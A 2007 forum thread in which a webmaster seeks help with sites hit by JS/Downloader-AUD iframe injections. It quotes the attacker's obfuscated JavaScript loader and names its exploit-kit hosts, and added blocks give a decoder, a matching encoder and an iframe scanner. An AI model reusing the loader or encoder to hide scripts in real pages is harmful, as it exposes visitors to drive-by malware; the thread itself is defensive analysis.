Webserver infection - JS/Downloader-AUD

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by Agouti, May 15, 2007.

  1. Agouti

    Agouti Private E-2

    Hi to the community, and sorry if this has been solved before, but anyway.
    I manage a dedicated webserver with around 250 sites, and have now had a second site infected - I assume - with JS/Downloader-AUD. I assume this because I got reports of McAfee and Norton detecting the script in Temporary Internet Files while browsing the site.
    I have googled it a bit, but can't find anything really helpful, so I'm hoping some bright cookie out there knows what it's all about, because I've pored over the sites and can't find anything anywhere... except for an invisible 1x1 <iframe> on every index.*, default.* and login.* pointing, using that annoying &%45 encoding stuff, to winhex.org, which in turn points towards http://agressor.info/exp/index.php in the same way. agressor has some ghastly script which I haven't worked out what it does. All it does for me is to output "Sorry! You IP is blocked.". Here it is for anyone who really, really wants to work it out (I've line-broken and tabbed it at semicolons and brackets and commented to make it a little clearer):

    Code:
    <script language=JavaScript>
    function makemelaugh(x){
        // t maps (charCode - 48) of each input character to a 6-bit value; the zero
        // entries are positions for characters the alphabet does not use.
        var l=x.length, b=1024, i, j, r, p=0, s=0, w=0,
            t=Array(63,6,8,26,37,47,48,41,58,50,0,0,0,0,0,0,25,56,11,23,33,10,9,49,52,39,38,46,20,59,14,28,21,57,36,19,18,53,32,16,60,3,4,0,0,0,0,43,0,62,13,35,7,24,17,12,5,2,0,61,1,42,29,15,22,34,54,31,44,45,51,55,30,40,27); // the array is for a fromCharCode based on horrid maths - I think this is what it uses to make up the script, it has things like < ? / ; etc
        for(j=Math.ceil(l/b);j>0;j--){              // process the input in chunks of b=1024 characters
            r='';
            for(i=Math.min(l,b);i>0;i--,l--){
                w|=(t[x.charCodeAt(p++)-48])<<s;    // append the next 6-bit value to the bit buffer w
                if(s){
                    r+=String.fromCharCode(170^w&255); // emit the low byte of w, XORed with 170 (0xAA)
                    w>>=8;
                    s-=2
                }else{
                    s=6
                }
            }
            document.write(r)                       // inject the decoded chunk into the page
        }
    }
    makemelaugh("E3@9oStwocb4QCgreokqENsGs_AA8_A6@_291CO9l0tvZ3@DF0gGx0grLi") // the string passed to makemelaugh is only important for its length, which is 58
    </script>
    
    P.S. The translations on winhex: the top is "Glory to Russia" and the bottom is "Remember our past".

    Also, whenever I navigate to winhex, or (sometimes) one of the pages on the affected sites, in IE, it wants to first download and then run an ActiveX script, from M$ corp (apparently), called 'Microsoft Data Access - Remote Data Services Dat...'

    I've read somewhere that JS/Downloader-AUD can infect a site through code insertion using a "Contact Us" form or the like, but I can't see how that would put the iframes in. I'm at this point assuming it's a brute-force/dictionary FTP login hack, which then inserts the iframes. Problem is, I went and removed all the iframes and apparently people are still getting the warnings.

    Anywho, thanks for reading this far, and I hope you can shed some light on this.
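The quoted makemelaugh() routine, re-implemented as an added example (this is not code from the original post or from the script's author). The original hands the decoded text straight to document.write(); this version returns it so the payload can be looked at offline without executing anything, and adds the inverse operation to show what the scheme is: 6-bit groups from a custom 64-character alphabet, packed least-significant-bit first, with every output byte XORed by 0xAA. The only input used is the 58-character string from the post; the table T is copied from the quoted script unchanged.

```javascript
// Lookup table copied verbatim from the quoted script. Index = charCode - 48,
// so it covers '0' (48) through 'z' (122); zero entries are unused positions.
const T = [63,6,8,26,37,47,48,41,58,50,0,0,0,0,0,0,25,56,11,23,33,10,9,49,52,
  39,38,46,20,59,14,28,21,57,36,19,18,53,32,16,60,3,4,0,0,0,0,43,0,62,13,35,7,
  24,17,12,5,2,0,61,1,42,29,15,22,34,54,31,44,45,51,55,30,40,27];

const XOR_KEY = 0xAA; // the literal 170 in the original

// The encoded argument from the post (the only string the script is given).
const SAMPLE = "E3@9oStwocb4QCgreokqENsGs_AA8_A6@_291CO9l0tvZ3@DF0gGx0grLi";

// Same loop as the original, minus the 1024-character chunking, which only
// exists so document.write() is called in pieces. Returns instead of writing.
function decodeMakemelaugh(encoded) {
  let w = 0;   // bit buffer
  let s = 0;   // shift at which the next 6-bit group lands in w (cycles 0,6,4,2)
  let out = '';
  for (let p = 0; p < encoded.length; p++) {
    const idx = encoded.charCodeAt(p) - 48;
    if (idx < 0 || idx >= T.length) {
      throw new Error(`character ${JSON.stringify(encoded[p])} at offset ${p} is outside the table`);
    }
    w |= T[idx] << s;
    if (s) {
      // At least 8 bits are buffered: emit one byte, XORed with the key, and drop it.
      out += String.fromCharCode(XOR_KEY ^ (w & 0xFF));
      w >>= 8;
      s -= 2;
    } else {
      s = 6;
    }
  }
  return out;
}

// Inverse table: 6-bit value -> the single character that encodes it. Only the
// 64 characters [0-9@A-Z_a-z] are alphabet members, and T is a bijection on them,
// so the encoding of a given text is unique.
const VALUE_TO_CHAR = [];
for (let i = 0; i < T.length; i++) {
  const ch = String.fromCharCode(i + 48);
  if (/^[0-9@A-Z_a-z]$/.test(ch)) VALUE_TO_CHAR[T[i]] = ch;
}

// Added encoder: the exact inverse of decodeMakemelaugh, useful for confirming
// the analysis (encode(decode(x)) must give x back) and for building test input.
function encodeMakemelaugh(plain) {
  let w = 0, bits = 0, out = '';
  for (let i = 0; i < plain.length; i++) {
    const byte = plain.charCodeAt(i);
    if (byte > 0xFF) throw new Error('encoder handles single-byte characters only');
    w |= (byte ^ XOR_KEY) << bits;   // bytes go in LSB-first, mirroring the decoder
    bits += 8;
    while (bits >= 6) {
      out += VALUE_TO_CHAR[w & 63];
      w >>= 6;
      bits -= 6;
    }
  }
  if (bits > 0) out += VALUE_TO_CHAR[w & 63]; // trailing 2 or 4 bits; no padding character
  return out;
}

console.log(JSON.stringify(decodeMakemelaugh(SAMPLE)));
console.log(encodeMakemelaugh(decodeMakemelaugh(SAMPLE)) === SAMPLE ? 'round trip OK' : 'round trip FAILED');
```

Run with node; for the string from the post it prints the "Sorry! You IP is blocked." markup the poster saw, which is what the blocked-IP branch of the server hands out. The same decoder will turn any other makemelaugh("...") argument captured from that server into readable HTML, so the thing to save when an unblocked client gets the real payload is the argument string, not the rendered page.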
     
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

  3. Agouti

    Agouti Private E-2

    Thanks for the reply chaslang, but unfortunately McAfee isn't much use, as it's a Linux server that I'm trying to clean, not my own machine. I was hoping someone would know what the JS script looks like embedded in the pages, or whether it is a MySQL code insertion or the like.

    Thanks for the M$ link, helps to narrow it down a bit.

    P.S. for anyone out there, McAfee has this
    I'm guessing that the JS below is the "encrypted" code.
     
    Last edited: May 17, 2007
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Are you saying you have a Linux server that is infected? If so, we cannot help you with that. This is Windows based forum.
     
  5. Agouti

    Agouti Private E-2

    Ah, hadn't realised that. Actually speaking, though, it's not the server itself per se that is infected - it's the website itself. So not talking binary or OS files, just PHP/ASPX/HTML. Plus the actual script itself is JavaScript, so it's fairly OS independent. The end-user computers being affected by the script, or more specifically the viruses the script is fetching, are Win32, but the script itself never actually infects a computer as such, or at least not past getting into the Temporary Internet Files. The main danger from this script appears to be in the little ActiveX bar when browsing pages with the script, which, when run, in turn downloads the actual viruses which infect the computer.
     
    Last edited: May 17, 2007
  6. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Based on the description it would sound like only systems or software that are not properly updated are susceptible to this script. Are you saying the PCs are not updated?

    Also, if you are implying the PCs are actually infected, how do you plan to fix them if they are not your PCs? Our methods require running the READ & RUN ME sticky thread procedure on the PCs and then working through the logs to determine what needs to be fixed. If the PCs are not available for you to do that, we also cannot help you fix the PCs.
     
  7. Agouti

    Agouti Private E-2

    The end-user PCs are not my concern or problem, thank goodness. What I guess I'm trying to find out here is any information people have on the actual JS script itself, as it sits inside the infected webpages, so I can go through the actual website that has the script inside it, and clean it out.
    The only reason I know the webpage was infected with the script (via, I assume, an FTP brute-force or the like) is that some people browsing the site got antivirus on-access alerts to it in the Temporary Internet Files.
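What the injected part looks like in the pages, according to the first post, is a 1x1 invisible iframe whose src is obscured with character encoding. The following Node.js scanner is an added example (not code from the post or from any product named in the thread) for finding that pattern in saved page source: it pulls out every <iframe> tag, decodes HTML numeric character references (&#119; and &#x77; forms) and percent-escapes in the src, and flags frames that are 1x1 or hidden by style. The post's "&%45 encoding" is ambiguous between those two encodings, so both are handled. The sample page and the host example.invalid below are constructed for this example and are not taken from the infected sites.

```javascript
// Decode the two common ways an iframe src is obscured: HTML numeric character
// references (decimal and hex, with or without the trailing ';') and then
// percent-escapes. Entities are decoded first so a layered "&#37;65" -> "%65" -> "e"
// still comes out right.
function decodeObscuredUrl(raw) {
  let s = raw;
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
  try {
    s = decodeURIComponent(s);
  } catch (e) {
    // Malformed escape (e.g. a lone '%'): keep the entity-decoded form.
  }
  return s.trim();
}

// Parse the attributes of one opening tag into a lowercase-keyed object.
// Handles double-quoted, single-quoted and unquoted values.
function parseAttributes(tagText) {
  const attrs = {};
  const body = tagText.replace(/^<\s*[a-zA-Z]+/, '');
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    let value = '';
    if (m[2] !== undefined) value = m[2];
    else if (m[3] !== undefined) value = m[3];
    else if (m[4] !== undefined) value = m[4];
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Return every iframe that is tiny, hidden by style, or has an obscured src,
// with the reasons it was flagged and the decoded target.
function findSuspiciousIframes(html) {
  const results = [];
  const tagRe = /<\s*iframe\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const a = parseAttributes(m[0]);
    const width = parseInt(a.width, 10);
    const height = parseInt(a.height, 10);
    const style = (a.style || '').replace(/\s+/g, '').toLowerCase();
    const src = a.src || '';
    const decodedSrc = decodeObscuredUrl(src);
    const reasons = [];
    if (!Number.isNaN(width) && width <= 1) reasons.push('width<=1');
    if (!Number.isNaN(height) && height <= 1) reasons.push('height<=1');
    if (/display:none|visibility:hidden/.test(style)) reasons.push('hidden by style');
    if (decodedSrc !== src) reasons.push('obscured src');
    if (reasons.length > 0) {
      results.push({ offset: m.index, src, decodedSrc, reasons });
    }
  }
  return results;
}

// Constructed sample page: one ordinary banner frame and one injected-style frame.
const SAMPLE_PAGE = [
  '<html><body>',
  '<h1>Welcome</h1>',
  '<iframe src="/legit/banner.html" width="468" height="60"></iframe>',
  '<iframe src="&#104;&#116;&#116;&#112;://%65xample.invalid/x.php" width=1 height=1 style="visibility: hidden"></iframe>',
  '</body></html>',
].join('\n');

for (const hit of findSuspiciousIframes(SAMPLE_PAGE)) {
  console.log(`offset ${hit.offset}: ${hit.decodedSrc}  [${hit.reasons.join(', ')}]`);
}
```

To sweep a webroot, feed each index.*, default.* and login.* file's contents to findSuspiciousIframes() (for example with fs.readFileSync inside a directory walk) and review the decoded targets; a frame that is flagged only for "obscured src" still deserves a look, since a legitimate page has no reason to entity-encode its own URLs. Removing the tags is only half the job, as the thread notes: if the FTP credentials used to plant them are unchanged, the iframes come back.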
     
  8. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    I don't have any information on that script other than what is available at the links you can freely Google. As noted at McAfee, the script is encrypted, which would make it more difficult to locate.

    Also, any Windows-based PC users that actually got infected by this script may also have gotten the below, as mentioned by McAfee:
    Generic Downloader.ab
     
